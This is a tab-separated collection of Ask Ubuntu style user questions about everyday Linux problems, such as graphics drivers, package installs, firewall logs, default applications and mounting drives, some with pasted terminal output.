368975	do man pages for the same command differ depending on source ?	apologies for the poorly worded question but when i look at the -i switch in man sed , i see : -i [ suffix ] , -- in-place [ =suffix ] edit files in place ( makes backup if suffix supplied ) that 's all . but then i came across quick note about sedâs edit in place option with a much longer explanation for sed -i also from a man page : from the sed manpage : -i extension edit files in-place , saving backups with the specified extension . if a zero-length extension is given , no backup will be saved . it is not recommended to give a zero-length extension when in-place editing files , as you risk corruption or partial content in situ- ations where disk space is exhausted , etc . so where can one access more detailed man pages ? and does anyone know the source of the more elaborate version ?
368976	assign spyder to open python files by default	i 'm using elementary os which has as a base ubuntu 12.04 . i have both canopy and spyder installed to manage my python files . when i installed canopy it set itself as the default app to open files with .py extension and now i find myself unable to modify this . the `` open with '' dialog does not show spyder as an option even though there is a spyder.desktop file stored in usr/share/applications , see below : i 've modified the ~/.local/share/applications/mimeapps.list file so spyder is the default app to open those files like so : [ default applications ] text/x-python=spyder.desktop this has the result that when i click on a .py file spyder will open but that file will not be opened inside it ( it restores the previous state , ie : the files that were left opened when the app was closed last ) i 've also modified another section of the above file : [ added associations ] text/x-python=geany.desktop ; scratch-text-editor.desktop ; spyder.desktop ; canopy.desktop ; to show spyder as an option in the `` open with '' menu to no avail . the reccomended applications dialog only shows canopy , geany and scratch and if i click on show other applications , spyder is still not listed . this are my .desktop files : /usr/share/applications/spyder.desktop ~/.local/share/applications/spyder.desktop what can i do to correctly set spyder as the app the opens .py files by default ?
368977	how do i add more visualizations into vlc ?	am using vlc 2.0.8 and i was wondering if its possible to add more visualizations to show when playing audio ? edit vlc has two waves in its scope visualization . is there a way i can remove one ? am looking for something like 'simple scope ' in banshee media player or 'blur scope ' in audacious . i tried the projectm visualizations but did n't like them ; i just then deleted them .
368986	os not loading ( kubuntu )	i need a help . my os ( kubuntu 13.04 ) not loading . i upload screenshot of this problem ( messages on monitor ) .
368989	ubuntu installation root partition	i have decided to install ubuntu for office , programming and gfx along windows 8 . i have made a usb - bootstick and so on , created a 100gb partition for ubuntu , so i wanted to install it on this partition , but he asks me for a root partition , but i still dont get what to do now . can u help me ? i am using windwos 8 and have a mainboard with uefi .
368991	is ubuntu system virus free or not ?	nice to hear about ubuntu , here i wanted to know that `` is ubuntu totally free from viruses ? 2nd thing thing is that what should we do whenever ubuntu got infected by a virus and how can we avoid viruses ? '' thanks
368994	how do i make krusader the default file manager ?	is it possible to set krusader as the default file manager in ubuntu 13.10 ? i tried to defined it in system settings > details > default applications but there is nothing about file manager there .
368995	ufw blocking random packets on 443	all , i have ufw setup to allow traffic on port 443 . it works as expected , though i have a large amount of ufw block log entries . to action from -- -- -- -- -- -- 80 allow anywhere 443 allow anywhere 22222 allow anywhere 80 allow anywhere ( v6 ) 443 allow anywhere ( v6 ) 22222 allow anywhere ( v6 ) however in my syslog file i see this : [ ufw block ] in=eth0 out= mac=xxx src= < foreignip > dst= < serverip > len=40 tos=0x00 prec=0x00 ttl=116 id=22025 df proto=tcp spt=49622 dpt=443 window=0 res=0x00 ack rst urgp=0 about 30 or so seconds later pound ( which i 'm using for ssl decryption and port redirection ) throws a connection timed out messsage . i 'm assuming this is because ufw is blocking the packet . i 'm at a loss as to an explination . could the packet be malformed or something , is this normal ? edit - i have since changed the /etc/defaults/ufw and set ipv6=no , so the v6 rules are no longer in the mix . the server is still showing the block / connection timed out behavior though . the new ufw status output is : status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip to action from -- -- -- -- -- -- 80 allow in anywhere 443 allow in anywhere 22222 allow in anywhere
368999	differences between dist-upgrade and upgrade from source.list	i 'm wondering what 's the differences between to do a system update with dist-upgrade and change source.list and do an update / upgrade . thanks ! !
369000	get multiple pages from google search	i 'm writing a bash script to get some data from google search . i used lynx for the query and redirect the results into a file for later parsing . the problem is that all i get is one page only , how can i get lynx to get the next page / number of pages ? i used grep and cut to isolate the url to be of the kind `` www.google.com/search ? q= ... .. '' but then when i try to resend it to lynx it does n't open the next page , just shows the link w/o opening it any suggestion ? tnx
369002	ca n't turn off backlight/display - 13.10 / imac	i can find no way to completely turn off the display on a late 2013 imac running 13.10 ( saucy ) . in the power management settings , i configured the display to `` turn off '' after one minute to see what would happen . the dimness goes all the way down and everything disappears , but the led backlight remains on . when i try the `` xset dpms force off '' command , absolutely nothing happens -- the command is accepted ( no error or warning ) , but nothing changes . i then wiped everything clean and installed 13.04 ( raring ) . both methods ( dpms and waiting for sleep ) work perfectly there , so something has changed in this new version . the problem can be replicated simply by booting from a bootable usb stick . so , i also gave version 14.04 ( trusty ) a try in this manner and it has the exact same issues as 13.10 . p.s . i would gladly use 13.04 , but the catch there is that i can not get the network card to function . i have spent a week now reading everything i can find on both of these matters with no luck at all . thank you in advance for any advice .
369007	copy virtualbox image files from mac osx to ubuntu using usb	i created a virtualbox image on mac osx 10.9 . i need to copy the files to a usb drive , in order to distribute it to ubuntu computers . i tried it with usb drive formatted on mac with hfs+ filesystem . when i try to copy files from usb to ubuntu , i get this error : the folder `` xxxx '' can not be handled , because you do not have the permission to read it . the files are read-only . basically my question is : how to copy large files ( 10gb ) from a mac to ubuntu ? i can not use fat32 , as the files are big . the usb drive formatted in ubuntu ext4 ; osx does not see the drive . i can not change the permissions using chmod -r 777 ./foldername as the files are read-only .
369010	nvidia gt 650m randomly detected as usb video device	here is a problem i have been having since switching from lm15 to ubuntu 13.10 . i installed the proprietary drivers , rebooted worked great . shut the computer off got the old nvidia black screen . rebooted into recovery , selected enable networking , when that was done i hit ctrl+c and the graphics driver boots . this made me think the nvidia current wasnt working so i tried all other versions in the official repo . i even installed 325 and it rebooted fine , but once the laptop shuts down it 'll be hit or miss if it black screens or not . i finally disabled the splash screen so i could see what was going on at boot . the correlating event for when the black screen occurs is that the card detects as a `` usb video device '' i tried the nomodeset and nvidia.modeset=0 tricks and they do n't help . i searched google a bit and could n't find mention of a card being detected as a usb video device . i do n't know what logs you may need , but it seems whenever i finally get into ubuntu i have about 6 crash errors for xorg . system specs nvidia geforce gt 650m 16gb ram intel core i7 3630qm samsung 840 ssd ( i dont think this would matter buy hey )
369012	how to run a complete gui as root ?	i do n't care if i mess up the system ( which is likely if i do things like this ) , or the potential security issues that this could imply . note , that i do n't just want to `` enable root login ? `` , but run my gui from bottom-up as root . i do n't want to type my password for anything but just for login and have total control over it . of course , i want any application running as root , like firefox , libreoffice , etc . without having to mess up with the terminal . so , how do i do this ? this question tries to address users that do not like the current permission system with root being separated from normal users . i do not endorse such behaviors , but if a user wants to , for whatever reason , this question should fit their corncerns . not advisable for new users
369015	hp m1132 printer is not working on ubuntu 13.10	i have a hp laserjet m1132 mfp printer . my desktop has pentium ( r ) dual-core cpu e5700 @ 3.00ghz ă 2 . i can not print or scan after upgrading to ubuntu 13.10 . i appreciate your help . best regards .
369017	graphical mode not working properly after installing ati properitary drivers	it 's my first question here , so please do n't be harsh ( i know you wo n't , just saying ) . ; ) i 'm working on ubuntu 13.10 as i updated it from 12.04 recently . previously ( when using 12.04 ) when i tried to install properitary graphics driver i had an information that ubuntu will work in low graphics mode and i also had option to restore previous display settings . in 13.10 , after update , i tried to do the same . i set the graphics driver ( in system options somewhere ) to the ati [ ... ] proprietary [ ... ] ( fglrx-update ) or something . after reboot i was unable to log in properly . well , i could log in , but the only thing i could do was to move mouse pointer on the blank screen . i looked up things on the internet ( including askubuntu ) and removed fglrx* packages though the tty console and made things even worse . now not even logon screen appears . just mouse poiter . lspci command tells that my graphics card is ati mobility radeon hd 5430/5450/hd5470 , if it would help . what should i do now ? edit : i found the solution . in recovery mode ( you should press shift key while booting and then select advanced ) i used a tool to fix broken packages .
369018	segmentation fault ( core dumped ) in mkpasswd	i want to generate password using blowfish encryption method . i have used mkpasswd-ratbox command . here is it : mkpasswd-ratbox -b -s 3dr -p test but it returns the message `` segmentation fault ( core dumped ) '' please tell me what is the right way to generate password using blowfish encryption .
369020	removing ubuntu 12.04 from external harddrive	i had ubuntu 12.04 installed on my 1tb hard drive , but i somehow corrupted gnome and now it just tells me to reinstall it . i cant uninstall it because i see no `` ubuntu '' directory on my hard drive . edit1 : it has data on it that is valuable and i can not format it . its not taking up any space some how , but i would like to reinstall ubuntu 12.04 again . any help ?
369021	pubmed smart scope in 13.10 does not work right	i was happy to see a pubmed scope included in the 13.10 dash . but i feel like im doing something wrong . for example : if i type `` hear failure '' in the dash i get a bunch of results . most of them music , amazon ... and oh ... when i scroll down i get a wikipedia article . but nothing from pubmed . if i specify my search as in `` pubmed : heart failure '' i get a no results message , which is weird because when i search pubmed directly it will give me 166794 results . am i doing something wrong or is that thing just not functioning like it should ? thanks .
369022	custom shortcut for switching off the display	i want to add a custom shortcut ( keyboard > > custom shortcuts > > add ) for turning off the display but to do that , what 'command ' should i should use ? i want to set a button to switch off the display and switch on .
369023	how do i install pepper-flash on chromium ?	i have chromium web browser on my lubuntu 13.04 ( pre-installed ) . i use lx terminal ( pre-installed ) to write commands . i am trying to download flash player on chromium using instructions on this site : sudo add-apt-repository ppa : skunk/pepper-flash after typing in my password , this worked . now sudo apt-get update i did n't need to type in my password , as i continued on the same terminal , but got w : / and e : / fetch file errors sudo apt-get install pepflashplugin-installer i continued on the same terminal despite the fetch file errors ... and they said pepflashplugin-installer could not be found . is the last error because of fetch file errors , or because i need to download pepflash-plugin-installer somewhere ? or is it because of something else ? i can not download the chrome browser , and not looking to use flash player on my firefox web browser ( installed using lubuntu software center ) .
369033	compiz using 40 % cpu on ubuntu 13.10	after upgrading to 13.10 , compiz process has started taking up to 40 % of cpu resources . in addition , unity is sluggish just like in this recent question compiz at 30 % of cpu on thinkpad t420 . my pc is hp compaq nx6310 and compiz version is 0.9.10.2 . first i had error message during boot , but did find solution for that ( bug # 1014289 ) by updating the kernel to newer 3.11.4 , it did not change the cpu usage . for the cpu problem i tried solution for bug # 1221837 by adding the line mesa_gl_version_override=1.4 in the file /etc/environment - that did not help me , so my problem seems not to be the same bug . any suggestions on how to resolve this issue ?
369037	cad ( photoshop , sketchup , corel ) apps on ubuntu ?	i am planning to replace windows , but i 'm worrying if cad application such as autodesk autocad , 3ds max , corel draw and sketchup , are they working well with ubuntu ?
369039	change mouse cursor while app is loading	how can i change the mouse cursor while an app is loading ? in windows a clock or timer appears while you wait until the software you execute launches . i wish i had something like that . thanks in advance !
369040	spanish accents on us keyboard	i have a good-old fashioned us keyboard . looks like english ( us ) . how can i get spanish accents on ubuntu 12.04 ? this article says i can use rightalt + a but the aritcle goes only to 11.04 . it also says something about dead keys , which do n't seem to work .
369041	xubuntu 13.10 pulseaudio indicator still loose	there is this common bug on xubuntu 13.10 that is fixed here : volume indicator issue after xubuntu 13.10 upgrade except this fix doesnt work here , i tried to execute /usr/lib/indicator-sound-gtk2/indicator-sound-service in terminal but it answered : ** ( process:2513 ) : warning ** : music-player-bridge.vala:262 : could not create a desktopappinfo instance from app : banshee.desktop.desktop ** ( process:2513 ) : warning ** : music-player-bridge.vala:86 : could not create app_info for path banshee.desktop getting out of here ** ( process:2513 ) : warning ** : music-player-bridge.vala:262 : could not create a desktopappinfo instance from app : vlc.desktop.desktop ** ( process:2513 ) : warning ** : music-player-bridge.vala:86 : could not create app_info for path vlc.desktop getting out of here so should i just wait for new versions banshee and vlc ? thank you
369042	mount external ext4 with changed uid and gid	i 'm trying to share a single external hard-drive between two ubuntu different machines . the problem is , my user uid and gids are different across the two machines . is there a mount option for ext4 or ext3 that allows you to temporarily change your uid or gid ? is my only option to have uniform uids across all my computers ?
369045	how to copy files from ubuntu server on to a usb	i am looking to copy files from my ubuntu server to a usb drive , the files are .c , .cpp , .lex , .java and .h .
369048	setting console resolution in ubuntu server 13.10 within vmware	i 've completed an install of ubuntu server 13.10 within vmware and am running into a problem configuring the console ( non-graphical ) resolution . when i was running ubuntu server 13.04 , i ran into the same problem ... posted the question here , which i later solved by editing /etc/default/grub thus : grub_cmdline_linux_default= '' splash vga=789 '' i then ran sudo update-grub , sudo reboot and 13.04 stuck in a larger-size console mode ... just what i wanted . but when i run the same commands in 13.10 , during the reboot it changes to the new screen-res , but the screen stays black and i ca n't interact with it . i power down the vm , go back to a previous snapshot , and try again ... and again . since the hwinfo package is no longer available , i ca n't run sudo hwinfo -- framebuffer to see what options are available . ideas anyone ? here are the uncommented settings in my /etc/default/grub file at this moment : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=false grub_timeout=10 grub_distributor=lsb_release -i -s 2 > /dev/null || echo debian grub_cmdline_linux_default= '' splash '' grub_cmdline_linux= '' find_preseed=/preseed.cfg '' grub_disable_linux_recovery=false grub_gfxmode=800x600
369050	how can i remove windows xp from harddrive	i installed ubuntu for the first time . i am very happy with it . my question is how can i erase windows xp from my hard drive and just keep ubuntu ? i finally had success with the direct download to my hard drive after several failures on dvd and cd 's i would like to totally get rid of xp . !
369051	where can i find the corresponding module.symvers and .config files for 12.04.3 i386 server ?	i am currently using ubuntu 12.04 lts with kernel 3.2 on my x86_64 laptop . i must compile a driver for an i686 machine running ubuntu 12.04.3 lts with kernel 3.8.0-29-generic . the driver compiles successfully , but on the target machine i get the usual disagrees about version for module_layout error message . however , i did succeed in building the same driver for an older kernel for the same machine , namely 2.6.32.15 . since then i archived the .config and module.symvers and copied them to the kernel source directory when having to rebuild the driver . is there a place where these two files can be downloaded from ? i mean the exact files which where generated for kernel as it is used in the lts versions ? or am i too blind to see the obvious how to build a driver on one machine for another completely different machine ? $ uname -a linux terahertz 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux $ modinfo its_drv.ko filename : its_drv.ko license : gpl vermagic : 3.8.0 smp 686 depends : with this driver insmod still complains about an invalid module format , but there is no further error message in dmesg .
369052	less trackpad features after upgrading to 13.10 ?	when i was using ubuntu 13.04 there was a trackpad edge feature that allowed me to highlight or drag something to continue in the direction when my finger reached the edge of the trackpad . but now in 13.10 this neat feature seems to be gone or disabled by default . how can i get it back ?
369053	ubuntu server ca n't use proxy	i am trying to connect to the internet via a proxy server , but when i do add the lines acquire : :protocol : :proxy `` protocol : //user : pass @ hostname : port/ '' ; etc . it does n't make any difference . since i use the ubuntu 13.10 server edition , i only have access to a terminal . can anyone help me ? ?
369057	apache still running after uninstalling	i am trying to uninstall apache to install nginx , but it does n't seem to work . $ ps aux | grep httpd root 22348 0.0 0.2 167252 8864 ? ss 14:33 0:00 /usr/sbin/httpd -k start -dssl apache 22353 0.0 0.1 167624 6088 ? s 14:33 0:00 /usr/sbin/httpd -k start -dssl apache 22354 0.0 0.1 167252 5292 ? s 14:33 0:00 /usr/sbin/httpd -k start -dssl apache 22355 0.0 0.1 167252 5052 ? s 14:33 0:00 /usr/sbin/httpd -k start -dssl apache 22356 0.0 0.1 167252 5052 ? s 14:33 0:00 /usr/sbin/httpd -k start -dssl apache 22357 0.0 0.1 167252 5052 ? s 14:33 0:00 /usr/sbin/httpd -k start -dssl apache 22797 0.0 0.1 167252 5052 ? s 14:38 0:00 /usr/sbin/httpd -k start -dssl 1003 22883 0.0 0.0 9388 884 pts/1 s+ 14:46 0:00 grep httpd $ which apache2 $ dpkg -s apache bash-completion : /etc/bash_completion.d/apache2ctl apparmor : /etc/apparmor.d/abstractions/apache2-common $ dpkg -s `which httpd` dpkg-query : no path found matching pattern /usr/sbin/httpd . the package seem to be uninstalled , but the processes are still running . and /usr/bin/httpd is still there . any hints ?
369058	need help installing ubuntu	can you help me install ubuntu alongside my windows 8.1 os on my toshiba satellite p875-s7102 ? i can not figure out how to get my particular model of laptop to boot from a usb and install ubuntu , or even allow me to try it out without installing . please help ?
369059	after installing nvidia drivers , ubuntu boots to black screen with blinking pointer	the boot takes like a minute , after that , it will go to a black screen with a blinking pointer . it does n't react to any stroke . ctrl alt f1 or f2 ... wo n't work . there is no grub . even printscreen+altgr+b does n't work but printscreen+altgr+o does . in the middle of the boot i get like 5 seconds where i can switch to tty1 , but before i get the chance to fully type my credentials , the system will go to the black screen . i would like to find a combination to force the system to boot on the shell and stops trying to run x because i think this is where the system hangs . any idea how do i recover ? ( i kept the old drivers installation ) ps : i am aware of all the similar posts here , but no one tells how to just get to the shell when ctr alt f1 is stuck .
369060	bad performance of open source graphics drivers ( ati mobility radeon )	i have a performance problem with my mobility radeon hd 54__ graphics card using default open source drivers . i 'm not talking about games but non-full hd videos . occasionally video freezes for a short while ( sound remains unaffected ) and then everything is fine for another while . sorry for my explanation but i could n't find words to describe that behaviour . i can not install proprietary drivers , because they seem to crash ubuntu ( 13.10 ) .
369064	no sound in html5 and google chrome after update to 13.10	after upgrading to ubuntu 13.10 i have no sound for html5 players in google chrome browser . firefox works . flash players are working . no sound on youtube when using html5 . no sound on vimeo ( they have html5 player as standard ) . when i open the soundapplication , google does n't show up when i try to play a html5 video . but it shows up , when playing a flash video . google chrome version is : 24.0.1312.52 installed an updated via ppa : deb http : //dl.google.com/linux/chrome/deb/ stable main
369066	cad applications , photoshop , sketchup , corel apps for ubuntu	i am planning to change from windows to ubuntu because windows is hard to maintain ( because of virus threats and expensive security software ) . but i 'm worrying whether cad applications such as autodesk autocad , 3ds max , coreldraw and sketchup , are working well with ubuntu os ?
369068	package-dependencies depend other packages	i installed ubuntu 12.04 lts a few days ago . so i want to install some programs . but this apt-get is driving me crazy ! when i want to install a package , does n't matter which one , it always reads that it can not install the dependencies itself . i tried using the -f option and the -- install-suggests option , but it still does n't work . and i ca n't use aptitude because it is not installed . so i tried installing the dependencies myself . but they require other packages . and when i want to install the jre for example , i have to install libatk-wrapper-java-jni , which needs the jre-package ! what is n't working ? is there a bug or a wrong configuration ? i searched the half www but did not find anything which helps . edit : i also tried using apt-get update and apt-get upgrade - without success .
369070	odd livecd error message that says `` ? ? ? ? ? ? ''	i have recently taken an interest in ubuntu and considered putting it on my old computer that just manages to get over the minimum requirements . however , ever since the launch of 13.10 , i have not managed to get past the network part of the installation on my livedvd due to some strange error message that popped up after a short pause that says `` ? ? ? ? ? ? '' as both the title and the subject . from there , i could not continue nor go back , only quit the installation . i even tried this with 12.04 and got the same result . here are my old computer 's specs : windows xp ( sp3 ) , amd athlon processor , 855mhz , 512mb ram although i have not seen any fixes on the forums and this error is making me lose out on ubuntu goodness , does anyone know how to fix this error ? thank you very much , bluehattedengie
369073	ubuntu installer offers to show differences , then doesn-t	when i was installing updates under 12.04 lts today , the ubuntu installer warned that there were differences between the local copy of smb.conf and that in the installer package . it offered me a drop/down list of options . i chose one which reads something like `` show differences side by side '' and clicked the only available button ( other than help , i think it was labelled continue ) the installer then proceeded with updates and asked for a reboot . even after rebooting , no comparison was shown . how can i find out now whether i still have my previous smb.conf or the one from the installer , and what the differences are ?
369074	second monitor to mirror specific workspace	i 'm using ubuntu gnome and i 'm looking for a way of making a second monitor display a specific workspace , for example the 2. workpace . if i switch workspaces at the primary desktop , the second screen should always display this specified workspace . does anyone have an idea ?
369083	can not install vlc in ubuntu 13.10	for some reasons i can not instal vlc media player on my ubuntu gnome 13.10 32bit . i added the videolan ppa repository and ran sudo apt-get update and sudo apt-get install vlc here 's the log - nisarg @ nisarg-thinkpad-t61 : ~ $ sudo apt-get install vlc reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : liba52-0.7.4 libaacs0 libass4 libavcodec53 libavformat53 libavutil51 libbluray1 libcddb2 libcrystalhd3 libdc1394-22 libdca0 libdirac-encoder0 libdirectfb-1.2-9 libdvbpsi8 libdvdnav4 libdvdread4 libebml3 libfaad2 libgsm1 libiso9660-8 libkate1 libmad0 libmatroska5 libmodplug1 libmpcdec6 libmpeg2-4 libopus0 libpostproc52 libresid-builder0c2a libschroedinger-1.0-0 libsdl-image1.2 libsdl1.2debian libsidplay2 libssh2-1 libswscale2 libtar0 libts-0.0-0 libtwolame0 libupnp6 libva-x11-1 libva1 libvcdinfo0 libvlc5 libvlccore5 libwebp4 libx264-123 libxcb-composite0 libxcb-keysyms1 libxcb-randr0 libxcb-xv0 libzvbi-common libzvbi0 tsconf vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse suggested packages : libbluray-bdj firmware-crystalhd libdvdcss2 debhelper opus-tools videolan-doc the following new packages will be installed : liba52-0.7.4 libaacs0 libass4 libavcodec53 libavformat53 libavutil51 libbluray1 libcddb2 libcrystalhd3 libdc1394-22 libdca0 libdirac-encoder0 libdirectfb-1.2-9 libdvbpsi8 libdvdnav4 libdvdread4 libebml3 libfaad2 libgsm1 libiso9660-8 libkate1 libmad0 libmatroska5 libmodplug1 libmpcdec6 libmpeg2-4 libopus0 libpostproc52 libresid-builder0c2a libschroedinger-1.0-0 libsdl-image1.2 libsdl1.2debian libsidplay2 libssh2-1 libswscale2 libtar0 libts-0.0-0 libtwolame0 libupnp6 libva-x11-1 libva1 libvcdinfo0 libvlc5 libvlccore5 libwebp4 libx264-123 libxcb-composite0 libxcb-keysyms1 libxcb-randr0 libxcb-xv0 libzvbi-common libzvbi0 tsconf vlc vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse 0 upgraded , 58 newly installed , 0 to remove and 7 not upgraded . need to get 16.7 mb of archives . after this operation , 75.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ saucy/main vlc-data all 2.0.8+git20131025+r620-0~r13~ubuntu13.10.1 [ 4,967 kb ] get:2 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ saucy/main libvlccore5 i386 2.0.8+git20131025+r620-0~r13~ubuntu13.10.1 [ 384 kb ] get:3 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ saucy/main libvlc5 i386 2.0.8+git20131025+r620-0~r13~ubuntu13.10.1 [ 42.4 kb ] get:4 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ saucy/main vlc-nox i386 2.0.8+git20131025+r620-0~r13~ubuntu13.10.1 [ 2,084 kb ] get:5 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ saucy/main vlc i386 2.0.8+git20131025+r620-0~r13~ubuntu13.10.1 [ 1,078 kb ] get:6 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ saucy/main vlc-plugin-notify i386 2.0.8+git20131025+r620-0~r13~ubuntu13.10.1 [ 5,836 b ] get:7 http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/ saucy/main vlc-plugin-pulse i386 2.0.8+git20131025+r620-0~r13~ubuntu13.10.1 [ 18.2 kb ] err http : //archive.ubuntu.com/ubuntu/ saucy/universe libaacs0 i386 0.6.0-2 connection failed [ ip : 91.189.92.176 80 ] 51 % [ waiting for headers ] now it does n't move forward after this point . any suggestions ?
369085	how to update lamp php version 5.3.10 to 5.5	i want to update lamp version . how can i update lamp with php-5.5 . i want to develop web applications with php , for that reason i need to install a lamp system , i heard that it 's a good idea to use latest versions of php , mysql and apache . how can i do this ?
369090	how to change font of language using ibus ?	i use 3 languages using ibus input in ubuntu 13.10 . how can i choose a custom font for one of the languages ? changing font in this window only temorarily changes the font of input . when i close this window and open again , font is again set back to the default value . is this some bug ?
369091	upgrading from raring to saucy broke many of my fonts in certain applications	i upgraded from raring to saucy over the weekend . two of my applications , dzen2 and xmobar , wo n't display the fonts they used to . i 'd mostly been using fixed and 6x12 . xmobar does n't run with these fonts . dzen2 shows some generic font i ca n't identify . i can change the size but not the font . the only exception is terminus . i looped over xlsfonts and piped them into a dzen2 to see what still worked . variants of terminus were fine . everything else used the same generic looking font face . no idea why . i have n't found any other applications with font issues since the update , but i have n't tried too hard to look either .
369095	ubuntu 12.04 does n't recgonize m cpu correctly	my computer is running ubuntu 12.04 ( 64bit ) , and i have a amd athlon ( tm ) x4 760k quad core processor which is about 3.8ghz ( and an radeon hd 7770 gpu ) . yet , when i type in cat /proc/cpuinfo - i get : processor : 0 vendor_id : authenticamd cpu family : 21 model : 19 model name : amd athlon ( tm ) x4 760k quad core processor stepping : 1 microcode : 0x6001119 cpu mhz : 1800.000 cache size : 2048 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 16 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 bogomips : 7599.97 tlb size : 1536 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro processor : 1 vendor_id : authenticamd cpu family : 21 model : 19 model name : amd athlon ( tm ) x4 760k quad core processor stepping : 1 microcode : 0x6001119 cpu mhz : 1800.000 cache size : 2048 kb physical id : 0 siblings : 4 core id : 1 cpu cores : 2 apicid : 17 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 bogomips : 7599.97 tlb size : 1536 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro processor : 2 vendor_id : authenticamd cpu family : 21 model : 19 model name : amd athlon ( tm ) x4 760k quad core processor stepping : 1 microcode : 0x6001119 cpu mhz : 1800.000 cache size : 2048 kb physical id : 0 siblings : 4 core id : 2 cpu cores : 2 apicid : 18 initial apicid : 2 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 bogomips : 7599.97 tlb size : 1536 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro processor : 3 vendor_id : authenticamd cpu family : 21 model : 19 model name : amd athlon ( tm ) x4 760k quad core processor stepping : 1 microcode : 0x6001119 cpu mhz : 1800.000 cache size : 2048 kb physical id : 0 siblings : 4 core id : 3 cpu cores : 2 apicid : 19 initial apicid : 3 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 bogomips : 7599.97 tlb size : 1536 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro the important part of all this being , cpu mhz : 1800.000 which indicates that i have only 1.8ghz of processing power , which is totally wrong . is it something with drivers or ubuntu ? ? also , will windows recognize all of my processing power ? thanks ! ( note : my cpu does n't have intigrated graphics
369098	missing kernel or very troubled purple screen	purchased a new msi ge 70 series laptop with nvidia gtx 765m graphics card . updated driver after install , and ran update manager . all seems well . restarted as required . now i have a solid purple screen , even if i use boot menu to recovery mode . all i can do is access grub menu . please help and i 'm still learning ubuntu . i also tried changing lines of kernel code using `` e '' on boot menu , nomodeset and some other post suggestions . not helping . any way to fix problem ? attempts : just tried to install 12.04 onto a ext hdd in attempt to get to a desktop and use the ext hdd to format the labtop for reinstall . no success . retrying the live cd . no effect . saying i need to load kernel first . help . think i might be buggered .
369099	unable to download ubuntu sdk	i am unable to download ubuntu sdk . whenever i try the command given on the website . i get an error saying unable to lock the administration directory .
369100	delete directory by referencing symbolic link	to set up the question , imagine this scenario : mkdir ~/temp cd ~/ ln -s temp temporary rm -rf temporary , rm -f temporary , and rm temporary each will remove the symbolic link but leave the directory ~/temp/ . i have a script where the name of the symbolic link is easily derived but the name of the linked directory is not . is there a way to remove the directory by referencing the symbolic link , short of parsing the name of the directory from ls -od ~/temporary ?
